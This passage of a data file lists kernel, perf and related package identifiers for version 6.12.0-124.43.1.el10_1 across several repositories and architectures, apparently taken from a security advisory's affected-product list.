"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
